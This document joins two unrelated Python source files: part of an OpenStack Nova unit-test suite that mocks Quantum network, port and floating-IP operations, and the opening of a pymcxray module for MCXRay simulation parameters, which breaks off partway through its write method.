mox_list_network_params = dict(tenant_id=self.instance['project_id'],
shared=False)
if search_ids:
mox_list_network_params['id'] = mox.SameElementsAs(search_ids)
self.moxed_client.list_networks(
**mox_list_network_params).AndReturn({'networks': nets})
mox_list_network_params = dict(shared=True)
if search_ids:
mox_list_network_params['id'] = mox.SameElementsAs(search_ids)
self.moxed_client.list_networks(
**mox_list_network_params).AndReturn({'networks': []})
for net_id in expected_network_order:
if kwargs.get('_break') == 'net_id2':
self.mox.ReplayAll()
return api
port_req_body = {
'port': {
'device_id': self.instance['uuid'],
'device_owner': 'compute:nova',
},
}
port = ports.get(net_id, None)
if port:
port_id = port['id']
self.moxed_client.update_port(port_id,
MyComparator(port_req_body)
).AndReturn(
{'port': port})
else:
fixed_ip = fixed_ips.get(net_id)
if fixed_ip:
port_req_body['port']['fixed_ips'] = [{'ip_address':
fixed_ip}]
port_req_body['port']['network_id'] = net_id
port_req_body['port']['admin_state_up'] = True
port_req_body['port']['tenant_id'] = \
self.instance['project_id']
if macs:
port_req_body['port']['mac_address'] = macs.pop()
res_port = {'port': {'id': 'fake'}}
api._populate_quantum_extension_values(
self.instance, port_req_body).AndReturn(None)
self.moxed_client.create_port(
MyComparator(port_req_body)).AndReturn(res_port)
if kwargs.get('_break') == 'pre_get_instance_nw_info':
self.mox.ReplayAll()
return api
api._get_instance_nw_info(mox.IgnoreArg(),
self.instance,
networks=nets).AndReturn(
self._returned_nw_info)
self.mox.ReplayAll()
return api
def _allocate_for_instance(self, net_idx=1, **kwargs):
api = self._stub_allocate_for_instance(net_idx, **kwargs)
return api.allocate_for_instance(self.context, self.instance, **kwargs)
def test_allocate_for_instance_1(self):
# Allocate one port in one network env.
self._allocate_for_instance(1)
def test_allocate_for_instance_2(self):
# Allocate one port in two networks env.
self._allocate_for_instance(2)
def test_allocate_for_instance_accepts_macs_kwargs_None(self):
# The macs kwarg should be accepted as None.
self._allocate_for_instance(1, macs=None)
def test_allocate_for_instance_accepts_macs_kwargs_set(self):
# The macs kwarg should be accepted, as a set, the
# _allocate_for_instance helper checks that the mac is used to create a
# port.
self._allocate_for_instance(1, macs=set(['ab:cd:ef:01:23:45']))
def test_allocate_for_instance_accepts_only_portid(self):
# Make sure allocate_for_instance works when only a portid is provided
self._returned_nw_info = self.port_data1
result = self._allocate_for_instance(
requested_networks=[(None, None, 'my_portid1')])
self.assertEqual(self.port_data1, result)
def test_allocate_for_instance_not_enough_macs_via_ports(self):
# using a hypervisor MAC via a pre-created port will stop it being
# used to dynamically create a port on a network. We put the network
# first in requested_networks so that if the code were to not pre-check
# requested ports, it would incorrectly assign the mac and not fail.
requested_networks = [
(self.nets2[1]['id'], None, None),
(None, None, 'my_portid1')]
api = self._stub_allocate_for_instance(
net_idx=2, requested_networks=requested_networks,
macs=set(['my_mac1']),
_break='net_id2')
self.assertRaises(exception.PortNotFree,
api.allocate_for_instance, self.context,
self.instance, requested_networks=requested_networks,
macs=set(['my_mac1']))
def test_allocate_for_instance_not_enough_macs(self):
# If not enough MAC addresses are available to allocate to networks, an
# error should be raised.
# We could pass in macs=set(), but that wouldn't tell us that
# allocate_for_instance tracks used macs properly, so we pass in one
# mac, and ask for two networks.
requested_networks = [
(self.nets2[1]['id'], None, None),
(self.nets2[0]['id'], None, None)]
api = self._stub_allocate_for_instance(
net_idx=2, requested_networks=requested_networks,
macs=set(['my_mac2']),
_break='pre_get_instance_nw_info')
self.assertRaises(exception.PortNotFree,
api.allocate_for_instance, self.context,
self.instance, requested_networks=requested_networks,
macs=set(['my_mac2']))
def test_allocate_for_instance_two_macs_two_networks(self):
# If two MACs are available and two networks requested, two new ports
# get made and no exceptions raised.
requested_networks = [
(self.nets2[1]['id'], None, None),
(self.nets2[0]['id'], None, None)]
self._allocate_for_instance(
net_idx=2, requested_networks=requested_networks,
macs=set(['my_mac2', 'my_mac1']))
def test_allocate_for_instance_mac_conflicting_requested_port(self):
# specify only first and last network
requested_networks = [(None, None, 'my_portid1')]
api = self._stub_allocate_for_instance(
net_idx=1, requested_networks=requested_networks,
macs=set(['unknown:mac']),
_break='pre_list_networks')
self.assertRaises(exception.PortNotUsable,
api.allocate_for_instance, self.context,
self.instance, requested_networks=requested_networks,
macs=set(['unknown:mac']))
def test_allocate_for_instance_with_requested_networks(self):
# specify only first and last network
requested_networks = [
(net['id'], None, None)
for net in (self.nets3[1], self.nets3[0], self.nets3[2])]
self._allocate_for_instance(net_idx=3,
requested_networks=requested_networks)
def test_allocate_for_instance_with_requested_networks_with_fixedip(self):
# specify only first and last network
requested_networks = [(self.nets1[0]['id'], '10.0.1.0/24', None)]
self._allocate_for_instance(net_idx=1,
requested_networks=requested_networks)
def test_allocate_for_instance_with_requested_networks_with_port(self):
requested_networks = [(None, None, 'myportid1')]
self._allocate_for_instance(net_idx=1,
requested_networks=requested_networks)
def test_allocate_for_instance_ex1(self):
"""verify we will delete created ports
if we fail to allocate all net resources.
Mox to raise exception when creating a second port.
In this case, the code should delete the first created port.
"""
api = quantumapi.API()
self.mox.StubOutWithMock(api, '_populate_quantum_extension_values')
self.moxed_client.list_networks(
tenant_id=self.instance['project_id'],
shared=False).AndReturn(
{'networks': self.nets2})
self.moxed_client.list_networks(shared=True).AndReturn(
{'networks': []})
index = 0
for network in self.nets2:
port_req_body = {
'port': {
'network_id': network['id'],
'admin_state_up': True,
'device_id': self.instance['uuid'],
'device_owner': 'compute:nova',
'tenant_id': self.instance['project_id'],
},
}
port = {'id': 'portid_' + network['id']}
api._populate_quantum_extension_values(
self.instance, port_req_body).AndReturn(None)
if index == 0:
self.moxed_client.create_port(
MyComparator(port_req_body)).AndReturn({'port': port})
else:
self.moxed_client.create_port(
MyComparator(port_req_body)).AndRaise(
Exception("fail to create port"))
index += 1
self.moxed_client.delete_port('portid_' + self.nets2[0]['id'])
self.mox.ReplayAll()
self.assertRaises(QUANTUM_CLIENT_EXCEPTION, api.allocate_for_instance,
self.context, self.instance)
def test_allocate_for_instance_ex2(self):
"""verify we have no port to delete
if we fail to allocate the first net resource.
Mox to raise exception when creating the first port.
In this case, the code should not delete any ports.
"""
api = quantumapi.API()
self.moxed_client.list_networks(
tenant_id=self.instance['project_id'],
shared=False).AndReturn(
{'networks': self.nets2})
self.moxed_client.list_networks(shared=True).AndReturn(
{'networks': []})
port_req_body = {
'port': {
'network_id': self.nets2[0]['id'],
'admin_state_up': True,
'device_id': self.instance['uuid'],
'tenant_id': self.instance['project_id'],
},
}
self.moxed_client.create_port(
MyComparator(port_req_body)).AndRaise(
Exception("fail to create port"))
self.mox.ReplayAll()
self.assertRaises(QUANTUM_CLIENT_EXCEPTION, api.allocate_for_instance,
self.context, self.instance)
def test_allocate_for_instance_no_port_or_network(self):
class BailOutEarly(Exception):
pass
api = quantumapi.API()
self.mox.StubOutWithMock(api, '_get_available_networks')
# Make sure we get an empty list and then bail out of the rest
# of the function
api._get_available_networks(self.context, self.instance['project_id'],
[]).AndRaise(BailOutEarly)
self.mox.ReplayAll()
self.assertRaises(BailOutEarly,
api.allocate_for_instance,
self.context, self.instance,
requested_networks=[(None, None, None)])
def test_allocate_for_instance_second_time(self):
# Make sure that allocate_for_instance only returns ports that it
# allocated during _that_ run.
new_port = {'id': 'fake'}
self._returned_nw_info = self.port_data1 + [new_port]
nw_info = self._allocate_for_instance()
self.assertEqual(nw_info, [new_port])
def _deallocate_for_instance(self, number):
port_data = number == 1 and self.port_data1 or self.port_data2
self.moxed_client.list_ports(
device_id=self.instance['uuid']).AndReturn(
{'ports': port_data})
for port in port_data:
self.moxed_client.delete_port(port['id'])
self.mox.ReplayAll()
api = quantumapi.API()
api.deallocate_for_instance(self.context, self.instance)
def test_deallocate_for_instance_1(self):
# Test to deallocate in one port env.
self._deallocate_for_instance(1)
def test_deallocate_for_instance_2(self):
# Test to deallocate in two ports env.
self._deallocate_for_instance(2)
def _test_deallocate_port_for_instance(self, number):
port_data = number == 1 and self.port_data1 or self.port_data2
self.moxed_client.delete_port(port_data[0]['id'])
nets = [port_data[0]['network_id']]
quantumv2.get_client(mox.IgnoreArg(), admin=True).AndReturn(
self.moxed_client)
self.moxed_client.list_ports(
tenant_id=self.instance['project_id'],
device_id=self.instance['uuid']).AndReturn(
{'ports': port_data[1:]})
quantumv2.get_client(mox.IgnoreArg()).MultipleTimes().AndReturn(
self.moxed_client)
self.moxed_client.list_networks(
tenant_id=self.instance['project_id'],
shared=False).AndReturn(
{'networks': [self.nets2[1]]})
self.moxed_client.list_networks(shared=True).AndReturn(
{'networks': []})
float_data = number == 1 and self.float_data1 or self.float_data2
for data in port_data[1:]:
for ip in data['fixed_ips']:
self.moxed_client.list_floatingips(
fixed_ip_address=ip['ip_address'],
port_id=data['id']).AndReturn(
{'floatingips': float_data[1:]})
for port in port_data[1:]:
self.moxed_client.list_subnets(id=['my_subid2']).AndReturn({})
self.mox.ReplayAll()
api = quantumapi.API()
nwinfo = api.deallocate_port_for_instance(self.context, self.instance,
port_data[0]['id'])
self.assertEqual(len(nwinfo), len(port_data[1:]))
if len(port_data) > 1:
self.assertEqual(nwinfo[0]['network']['id'], 'my_netid2')
def test_deallocate_port_for_instance_1(self):
# Test to deallocate the first and only port
self._test_deallocate_port_for_instance(1)
def test_deallocate_port_for_instance_2(self):
# Test to deallocate the first port of two
self._test_deallocate_port_for_instance(2)
def test_list_ports(self):
search_opts = {'parm': 'value'}
self.moxed_client.list_ports(**search_opts)
self.mox.ReplayAll()
quantumapi.API().list_ports(self.context, **search_opts)
def test_show_port(self):
self.moxed_client.show_port('foo')
self.mox.ReplayAll()
quantumapi.API().show_port(self.context, 'foo')
def test_validate_networks(self):
requested_networks = [('my_netid1', 'test', None),
('my_netid2', 'test2', None)]
self.moxed_client.list_networks(
id=mox.SameElementsAs(['my_netid1', 'my_netid2']),
tenant_id=self.context.project_id,
shared=False).AndReturn(
{'networks': self.nets2})
self.moxed_client.list_networks(
id=mox.SameElementsAs(['my_netid1', 'my_netid2']),
shared=True).AndReturn(
{'networks': []})
self.mox.ReplayAll()
api = quantumapi.API()
api.validate_networks(self.context, requested_networks)
def test_validate_networks_ex_1(self):
requested_networks = [('my_netid1', 'test', None),
('my_netid2', 'test2', None)]
self.moxed_client.list_networks(
id=mox.SameElementsAs(['my_netid1', 'my_netid2']),
tenant_id=self.context.project_id,
shared=False).AndReturn(
{'networks': self.nets1})
self.moxed_client.list_networks(
id=mox.SameElementsAs(['my_netid1', 'my_netid2']),
shared=True).AndReturn(
{'networks': []})
self.mox.ReplayAll()
api = quantumapi.API()
try:
api.validate_networks(self.context, requested_networks)
except exception.NetworkNotFound as ex:
self.assertTrue("my_netid2" in str(ex))
def test_validate_networks_ex_2(self):
requested_networks = [('my_netid1', 'test', None),
('my_netid2', 'test2', None),
('my_netid3', 'test3', None)]
self.moxed_client.list_networks(
id=mox.SameElementsAs(['my_netid1', 'my_netid2', 'my_netid3']),
tenant_id=self.context.project_id,
shared=False).AndReturn(
{'networks': self.nets1})
self.moxed_client.list_networks(
id=mox.SameElementsAs(['my_netid1', 'my_netid2', 'my_netid3']),
shared=True).AndReturn(
{'networks': []})
self.mox.ReplayAll()
api = quantumapi.API()
try:
api.validate_networks(self.context, requested_networks)
except exception.NetworkNotFound as ex:
self.assertTrue("my_netid2, my_netid3" in str(ex))
def _mock_list_ports(self, port_data=None):
if port_data is None:
port_data = self.port_data2
address = self.port_address
self.moxed_client.list_ports(
fixed_ips=MyComparator('ip_address=%s' % address)).AndReturn(
{'ports': port_data})
self.mox.ReplayAll()
return address
def test_get_instance_uuids_by_ip_filter(self):
self._mock_list_ports()
filters = {'ip': '^10\\.0\\.1\\.2$'}
api = quantumapi.API()
result = api.get_instance_uuids_by_ip_filter(self.context, filters)
self.assertEquals('device_id1', result[0]['instance_uuid'])
self.assertEquals('device_id2', result[1]['instance_uuid'])
def test_get_fixed_ip_by_address_fails_for_no_ports(self):
address = self._mock_list_ports(port_data=[])
api = quantumapi.API()
self.assertRaises(exception.FixedIpNotFoundForAddress,
api.get_fixed_ip_by_address,
self.context, address)
def test_get_fixed_ip_by_address_succeeds_for_1_port(self):
address = self._mock_list_ports(port_data=self.port_data1)
api = quantumapi.API()
result = api.get_fixed_ip_by_address(self.context, address)
self.assertEquals('device_id1', result['instance_uuid'])
def test_get_fixed_ip_by_address_fails_for_more_than_1_port(self):
address = self._mock_list_ports()
api = quantumapi.API()
self.assertRaises(exception.FixedIpAssociatedWithMultipleInstances,
api.get_fixed_ip_by_address,
self.context, address)
def _get_available_networks(self, prv_nets, pub_nets, req_ids=None):
api = quantumapi.API()
nets = prv_nets + pub_nets
mox_list_network_params = dict(tenant_id=self.instance['project_id'],
shared=False)
if req_ids:
mox_list_network_params['id'] = req_ids
self.moxed_client.list_networks(
**mox_list_network_params).AndReturn({'networks': prv_nets})
mox_list_network_params = dict(shared=True)
if req_ids:
mox_list_network_params['id'] = req_ids
self.moxed_client.list_networks(
**mox_list_network_params).AndReturn({'networks': pub_nets})
self.mox.ReplayAll()
rets = api._get_available_networks(self.context,
self.instance['project_id'],
req_ids)
self.assertEqual(rets, nets)
def test_get_available_networks_all_private(self):
self._get_available_networks(prv_nets=self.nets2, pub_nets=[])
def test_get_available_networks_all_public(self):
self._get_available_networks(prv_nets=[], pub_nets=self.nets2)
def test_get_available_networks_private_and_public(self):
self._get_available_networks(prv_nets=self.nets1, pub_nets=self.nets4)
def test_get_available_networks_with_network_ids(self):
prv_nets = [self.nets3[0]]
pub_nets = [self.nets3[-1]]
# specify only first and last network
req_ids = [net['id'] for net in (self.nets3[0], self.nets3[-1])]
self._get_available_networks(prv_nets, pub_nets, req_ids)
def test_get_floating_ip_pools(self):
api = quantumapi.API()
search_opts = {'router:external': True}
self.moxed_client.list_networks(**search_opts).\
AndReturn({'networks': [self.fip_pool, self.fip_pool_nova]})
self.mox.ReplayAll()
pools = api.get_floating_ip_pools(self.context)
expected = [{'name': self.fip_pool['name']},
{'name': self.fip_pool_nova['name']}]
self.assertEqual(expected, pools)
def _get_expected_fip_model(self, fip_data, idx=0):
expected = {'id': fip_data['id'],
'address': fip_data['floating_ip_address'],
'pool': self.fip_pool['name'],
'project_id': fip_data['tenant_id'],
'fixed_ip_id': fip_data['port_id'],
'fixed_ip':
{'address': fip_data['fixed_ip_address']},
'instance': ({'uuid': self.port_data2[idx]['device_id']}
if fip_data['port_id']
else None)}
return expected
def _test_get_floating_ip(self, fip_data, idx=0, by_address=False):
api = quantumapi.API()
fip_id = fip_data['id']
net_id = fip_data['floating_network_id']
address = fip_data['floating_ip_address']
if by_address:
self.moxed_client.list_floatingips(floating_ip_address=address).\
AndReturn({'floatingips': [fip_data]})
else:
self.moxed_client.show_floatingip(fip_id).\
AndReturn({'floatingip': fip_data})
self.moxed_client.show_network(net_id).\
AndReturn({'network': self.fip_pool})
if fip_data['port_id']:
self.moxed_client.show_port(fip_data['port_id']).\
AndReturn({'port': self.port_data2[idx]})
self.mox.ReplayAll()
expected = self._get_expected_fip_model(fip_data, idx)
if by_address:
fip = api.get_floating_ip_by_address(self.context, address)
else:
fip = api.get_floating_ip(self.context, fip_id)
self.assertEqual(expected, fip)
def test_get_floating_ip_unassociated(self):
self._test_get_floating_ip(self.fip_unassociated, idx=0)
def test_get_floating_ip_associated(self):
self._test_get_floating_ip(self.fip_associated, idx=1)
def test_get_floating_ip_by_address(self):
self._test_get_floating_ip(self.fip_unassociated, idx=0,
by_address=True)
def test_get_floating_ip_by_address_associated(self):
self._test_get_floating_ip(self.fip_associated, idx=1,
by_address=True)
def test_get_floating_ip_by_address_not_found(self):
api = quantumapi.API()
address = self.fip_unassociated['floating_ip_address']
self.moxed_client.list_floatingips(floating_ip_address=address).\
AndReturn({'floatingips': []})
self.mox.ReplayAll()
self.assertRaises(exception.FloatingIpNotFoundForAddress,
api.get_floating_ip_by_address,
self.context, address)
def test_get_floating_ip_by_address_multiple_found(self):
api = quantumapi.API()
address = self.fip_unassociated['floating_ip_address']
self.moxed_client.list_floatingips(floating_ip_address=address).\
AndReturn({'floatingips': [self.fip_unassociated] * 2})
self.mox.ReplayAll()
self.assertRaises(exception.FloatingIpMultipleFoundForAddress,
api.get_floating_ip_by_address,
self.context, address)
def test_get_floating_ips_by_project(self):
api = quantumapi.API()
project_id = self.context.project_id
self.moxed_client.list_floatingips(tenant_id=project_id).\
AndReturn({'floatingips': [self.fip_unassociated,
self.fip_associated]})
search_opts = {'router:external': True}
self.moxed_client.list_networks(**search_opts).\
AndReturn({'networks': [self.fip_pool, self.fip_pool_nova]})
self.moxed_client.list_ports(tenant_id=project_id).\
AndReturn({'ports': self.port_data2})
self.mox.ReplayAll()
expected = [self._get_expected_fip_model(self.fip_unassociated),
self._get_expected_fip_model(self.fip_associated, idx=1)]
fips = api.get_floating_ips_by_project(self.context)
self.assertEqual(expected, fips)
def _test_get_instance_id_by_floating_address(self, fip_data,
associated=False):
api = quantumapi.API()
address = fip_data['floating_ip_address']
self.moxed_client.list_floatingips(floating_ip_address=address).\
AndReturn({'floatingips': [fip_data]})
if associated:
self.moxed_client.show_port(fip_data['port_id']).\
AndReturn({'port': self.port_data2[1]})
self.mox.ReplayAll()
if associated:
expected = self.port_data2[1]['device_id']
else:
expected = None
fip = api.get_instance_id_by_floating_address(self.context, address)
self.assertEqual(expected, fip)
def test_get_instance_id_by_floating_address(self):
self._test_get_instance_id_by_floating_address(self.fip_unassociated)
def test_get_instance_id_by_floating_address_associated(self):
self._test_get_instance_id_by_floating_address(self.fip_associated,
associated=True)
def test_allocate_floating_ip(self):
api = quantumapi.API()
pool_name = self.fip_pool['name']
pool_id = self.fip_pool['id']
search_opts = {'router:external': True,
'fields': 'id',
'name': pool_name}
self.moxed_client.list_networks(**search_opts).\
AndReturn({'networks': [self.fip_pool]})
self.moxed_client.create_floatingip(
{'floatingip': {'floating_network_id': pool_id}}).\
AndReturn({'floatingip': self.fip_unassociated})
self.mox.ReplayAll()
fip = api.allocate_floating_ip(self.context, 'ext_net')
self.assertEqual(fip, self.fip_unassociated['floating_ip_address'])
def test_allocate_floating_ip_with_pool_id(self):
api = quantumapi.API()
pool_name = self.fip_pool['name']
pool_id = self.fip_pool['id']
search_opts = {'router:external': True,
'fields': 'id',
'id': pool_id}
self.moxed_client.list_networks(**search_opts).\
AndReturn({'networks': [self.fip_pool]})
self.moxed_client.create_floatingip(
{'floatingip': {'floating_network_id': pool_id}}).\
AndReturn({'floatingip': self.fip_unassociated})
self.mox.ReplayAll()
fip = api.allocate_floating_ip(self.context, pool_id)
self.assertEqual(fip, self.fip_unassociated['floating_ip_address'])
def test_allocate_floating_ip_with_default_pool(self):
api = quantumapi.API()
pool_name = self.fip_pool_nova['name']
pool_id = self.fip_pool_nova['id']
search_opts = {'router:external': True,
'fields': 'id',
'name': pool_name}
self.moxed_client.list_networks(**search_opts).\
AndReturn({'networks': [self.fip_pool_nova]})
self.moxed_client.create_floatingip(
{'floatingip': {'floating_network_id': pool_id}}).\
AndReturn({'floatingip': self.fip_unassociated})
self.mox.ReplayAll()
fip = api.allocate_floating_ip(self.context)
self.assertEqual(fip, self.fip_unassociated['floating_ip_address'])
def test_release_floating_ip(self):
api = quantumapi.API()
address = self.fip_unassociated['floating_ip_address']
fip_id = self.fip_unassociated['id']
self.moxed_client.list_floatingips(floating_ip_address=address).\
AndReturn({'floatingips': [self.fip_unassociated]})
self.moxed_client.delete_floatingip(fip_id)
self.mox.ReplayAll()
api.release_floating_ip(self.context, address)
def test_release_floating_ip_associated(self):
api = quantumapi.API()
address = self.fip_associated['floating_ip_address']
fip_id = self.fip_associated['id']
self.moxed_client.list_floatingips(floating_ip_address=address).\
AndReturn({'floatingips': [self.fip_associated]})
self.mox.ReplayAll()
self.assertRaises(exception.FloatingIpAssociated,
api.release_floating_ip, self.context, address)
def _setup_mock_for_refresh_cache(self, api):
nw_info = self.mox.CreateMock(model.NetworkInfo)
nw_info.json()
self.mox.StubOutWithMock(api, '_get_instance_nw_info')
api._get_instance_nw_info(mox.IgnoreArg(), self.instance).\
AndReturn(nw_info)
self.mox.StubOutWithMock(api.db, 'instance_info_cache_update')
api.db.instance_info_cache_update(mox.IgnoreArg(),
self.instance['uuid'],
mox.IgnoreArg())
def test_associate_floating_ip(self):
api = quantumapi.API()
address = self.fip_associated['floating_ip_address']
fixed_address = self.fip_associated['fixed_ip_address']
fip_id = self.fip_associated['id']
search_opts = {'device_owner': 'compute:nova',
'device_id': self.instance['uuid']}
self.moxed_client.list_ports(**search_opts).\
AndReturn({'ports': [self.port_data2[1]]})
self.moxed_client.list_floatingips(floating_ip_address=address).\
AndReturn({'floatingips': [self.fip_associated]})
self.moxed_client.update_floatingip(
fip_id, {'floatingip': {'port_id': self.fip_associated['port_id'],
'fixed_ip_address': fixed_address}})
self._setup_mock_for_refresh_cache(api)
self.mox.ReplayAll()
api.associate_floating_ip(self.context, self.instance,
address, fixed_address)
def test_associate_floating_ip_not_found_fixed_ip(self):
api = quantumapi.API()
address = self.fip_associated['floating_ip_address']
fixed_address = self.fip_associated['fixed_ip_address']
fip_id = self.fip_associated['id']
search_opts = {'device_owner': 'compute:nova',
'device_id': self.instance['uuid']}
self.moxed_client.list_ports(**search_opts).\
AndReturn({'ports': [self.port_data2[0]]})
self.mox.ReplayAll()
self.assertRaises(exception.FixedIpNotFoundForAddress,
api.associate_floating_ip, self.context,
self.instance, address, fixed_address)
def test_disassociate_floating_ip(self):
api = quantumapi.API()
address = self.fip_associated['floating_ip_address']
fip_id = self.fip_associated['id']
self.moxed_client.list_floatingips(floating_ip_address=address).\
AndReturn({'floatingips': [self.fip_associated]})
self.moxed_client.update_floatingip(
fip_id, {'floatingip': {'port_id': None}})
self._setup_mock_for_refresh_cache(api)
self.mox.ReplayAll()
api.disassociate_floating_ip(self.context, self.instance, address)
def test_add_fixed_ip_to_instance(self):
api = quantumapi.API()
self._setup_mock_for_refresh_cache(api)
network_id = 'my_netid1'
search_opts = {'network_id': network_id}
self.moxed_client.list_subnets(
**search_opts).AndReturn({'subnets': self.subnet_data_n})
zone = 'compute:%s' % self.instance['availability_zone']
search_opts = {'device_id': self.instance['uuid'],
'device_owner': 'compute:nova',
'network_id': network_id}
self.moxed_client.list_ports(
**search_opts).AndReturn({'ports': self.port_data1})
port_req_body = {
'port': {
'fixed_ips': [{'subnet_id': 'my_subid1'},
{'subnet_id': 'my_subid1'}],
},
}
port = self.port_data1[0]
port['fixed_ips'] = [{'subnet_id': 'my_subid1'}]
self.moxed_client.update_port('my_portid1',
MyComparator(port_req_body)).AndReturn({'port': port})
self.mox.ReplayAll()
api.add_fixed_ip_to_instance(self.context, self.instance, network_id)
def test_remove_fixed_ip_from_instance(self):
api = quantumapi.API()
self._setup_mock_for_refresh_cache(api)
address = '10.0.0.3'
zone = 'compute:%s' % self.instance['availability_zone']
search_opts = {'device_id': self.instance['uuid'],
'device_owner': zone,
'fixed_ips': 'ip_address=%s' % address}
self.moxed_client.list_ports(
**search_opts).AndReturn({'ports': self.port_data1})
port_req_body = {
'port': {
'fixed_ips': [],
},
}
port = self.port_data1[0]
port['fixed_ips'] = []
self.moxed_client.update_port('my_portid1',
MyComparator(port_req_body)).AndReturn({'port': port})
self.mox.ReplayAll()
api.remove_fixed_ip_from_instance(self.context, self.instance, address)
def test_list_floating_ips_without_l3_support(self):
api = quantumapi.API()
QuantumNotFound = quantumv2.exceptions.QuantumClientException(
status_code=404)
self.moxed_client.list_floatingips(
fixed_ip_address='1.1.1.1', port_id=1).AndRaise(QuantumNotFound)
self.mox.ReplayAll()
quantumv2.get_client('fake')
floatingips = api._get_floating_ips_by_fixed_and_port(
self.moxed_client, '1.1.1.1', 1)
self.assertEqual(floatingips, [])
class TestQuantumv2ModuleMethods(test.TestCase):
def test_ensure_requested_network_ordering_no_preference_ids(self):
l = [1, 2, 3]
quantumapi._ensure_requested_network_ordering(
lambda x: x,
l,
None)
def test_ensure_requested_network_ordering_no_preference_hashes(self):
l = [{'id': 3}, {'id': 1}, {'id': 2}]
quantumapi._ensure_requested_network_ordering(
lambda x: x['id'],
l,
None)
self.assertEqual(l, [{'id': 3}, {'id': 1}, {'id': 2}])
def test_ensure_requested_network_ordering_with_preference(self):
l = [{'id': 3}, {'id': 1}, {'id': 2}]
quantumapi._ensure_requested_network_ordering(
lambda x: x['id'],
l,
[1, 2, 3])
self.assertEqual(l, [{'id': 1}, {'id': 2}, {'id': 3}])
| zestrada/nova-cs498cc | nova/tests/network/test_quantumv2.py | Python | apache-2.0 | 55,258 |
#!/usr/bin/env python
"""
.. py:currentmodule:: FileFormat.SimulationParameters
.. moduleauthor:: Hendrix Demers <[email protected]>
MCXRay simulation parameters input file.
"""
# Script information for the file.
__author__ = "Hendrix Demers ([email protected])"
__version__ = ""
__date__ = ""
__copyright__ = "Copyright (c) 2012 Hendrix Demers"
__license__ = ""
# Subversion informations for the file.
__svnRevision__ = "$Revision$"
__svnDate__ = "$Date$"
__svnId__ = "$Id$"
# Standard library modules.
import copy
# Third party modules.
# Local modules.
# Project modules
import pymcxray.FileFormat.MCXRayModel as MCXRayModel
import pymcxray.FileFormat.Version as Version
# Globals and constants variables.
KEY_BASE_FILENAME = "BaseFileName"
KEY_NUMBER_ELECTRONS = "ElectronNbr"
KEY_NUMBER_PHOTONS = "PhotonNbr"
KEY_NUMBER_WINDOWS = "WindowNbr"
KEY_NUMBER_FILMS_X = "FilmNbrX"
KEY_NUMBER_FILMS_Y = "FilmNbrY"
KEY_NUMBER_FILMS_Z = "FilmNbrZ"
KEY_NUMBER_CHANNELS = "SpectraChannel"
KEY_ENERGY_CHANNEL_WIDTH = "EnergyChannelWidth"
KEY_SPECTRA_INTERPOLATION_MODEL = "SpectraInterpolation"
KEY_VOXEL_SIMPLIFICATION = "VoxelSimplification"
KEY_ELASTIC_CROSS_SECTION_SCALING_FACTOR = "ElasticCrossSectionScalingFactor"
KEY_ENERGY_LOSS_SCALING_FACTOR = "EnergyLossScalingFactor"
class SimulationParameters(object):
def __init__(self):
self.version = copy.deepcopy(Version.CURRENT_VERSION)
self._keys = self._createKeys()
self._parameters = {}
self.defaultValues()
def _createKeys(self):
keys = []
keys.append(KEY_BASE_FILENAME)
keys.append(KEY_NUMBER_ELECTRONS)
keys.append(KEY_NUMBER_PHOTONS)
keys.append(KEY_NUMBER_WINDOWS)
keys.append(KEY_NUMBER_FILMS_X)
keys.append(KEY_NUMBER_FILMS_Y)
keys.append(KEY_NUMBER_FILMS_Z)
if self.version == Version.BEFORE_VERSION:
keys.append(KEY_NUMBER_CHANNELS)
else:
keys.append(KEY_ENERGY_CHANNEL_WIDTH)
keys.append(KEY_SPECTRA_INTERPOLATION_MODEL)
keys.append(KEY_VOXEL_SIMPLIFICATION)
if self.version >= Version.VERSION_1_4_4:
keys.append(KEY_ELASTIC_CROSS_SECTION_SCALING_FACTOR)
keys.append(KEY_ENERGY_LOSS_SCALING_FACTOR)
return keys
def defaultValues(self):
baseFilenameRef = r"Results\McXRay"
self.baseFilename = baseFilenameRef
self.numberElectrons = 1000
self.numberPhotons = 10000
self.numberWindows = 64
self.numberFilmsX = 128
self.numberFilmsY = 128
self.numberFilmsZ = 128
self.numberChannels = 1024
self.energyChannelWidth_eV = 5.0
self.spectrumInterpolationModel = MCXRayModel.SpectrumInterpolationModel.TYPE_LINEAR_DOUBLE
self.voxelSimplification = None
self.elasticCrossSectionScalingFactor = 1.0
self.energyLossScalingFactor = 1.0
def _createExtractMethod(self):
extractMethods = {}
extractMethods[KEY_BASE_FILENAME] = str
extractMethods[KEY_NUMBER_ELECTRONS] = int
extractMethods[KEY_NUMBER_PHOTONS] = int
extractMethods[KEY_NUMBER_WINDOWS] = int
extractMethods[KEY_NUMBER_FILMS_X] = int
extractMethods[KEY_NUMBER_FILMS_Y] = int
extractMethods[KEY_NUMBER_FILMS_Z] = int
extractMethods[KEY_NUMBER_CHANNELS] = int
extractMethods[KEY_ENERGY_CHANNEL_WIDTH] = float
extractMethods[KEY_SPECTRA_INTERPOLATION_MODEL] = self._extractSpectrumInterpolationModel
extractMethods[KEY_VOXEL_SIMPLIFICATION] = bool
extractMethods[KEY_ELASTIC_CROSS_SECTION_SCALING_FACTOR] = float
extractMethods[KEY_ENERGY_LOSS_SCALING_FACTOR] = float
return extractMethods
def _createFormatMethod(self):
fromatMethods = {}
fromatMethods[KEY_BASE_FILENAME] = "%s"
fromatMethods[KEY_NUMBER_ELECTRONS] = "%i"
fromatMethods[KEY_NUMBER_PHOTONS] = "%i"
fromatMethods[KEY_NUMBER_WINDOWS] = "%i"
fromatMethods[KEY_NUMBER_FILMS_X] = "%i"
fromatMethods[KEY_NUMBER_FILMS_Y] = "%i"
fromatMethods[KEY_NUMBER_FILMS_Z] = "%i"
fromatMethods[KEY_NUMBER_CHANNELS] = "%i"
fromatMethods[KEY_ENERGY_CHANNEL_WIDTH] = "%s"
fromatMethods[KEY_SPECTRA_INTERPOLATION_MODEL] = "%s"
fromatMethods[KEY_VOXEL_SIMPLIFICATION] = "%s"
fromatMethods[KEY_ELASTIC_CROSS_SECTION_SCALING_FACTOR] = "%.5f"
fromatMethods[KEY_ENERGY_LOSS_SCALING_FACTOR] = "%.5f"
return fromatMethods
def _extractSpectrumInterpolationModel(self, text):
model = MCXRayModel.SpectrumInterpolationModel(int(text))
return model
def read(self, filepath):
self.version.readFromFile(filepath)
lines = open(filepath, 'r').readlines()
extractMethods = self._createExtractMethod()
for line in lines:
line = line.strip()
for key in self._keys:
if line.startswith(key):
items = line.split('=')
self._parameters[key] = extractMethods[key](items[-1])
def write(self, filepath):
outputFile = open(filepath, 'w')
self._writeHeader(outputFile)
self.version.writeLine(outputFile)
formatMethods = self._createFormatMethod()
keys = self._createKeys()
for key in keys:
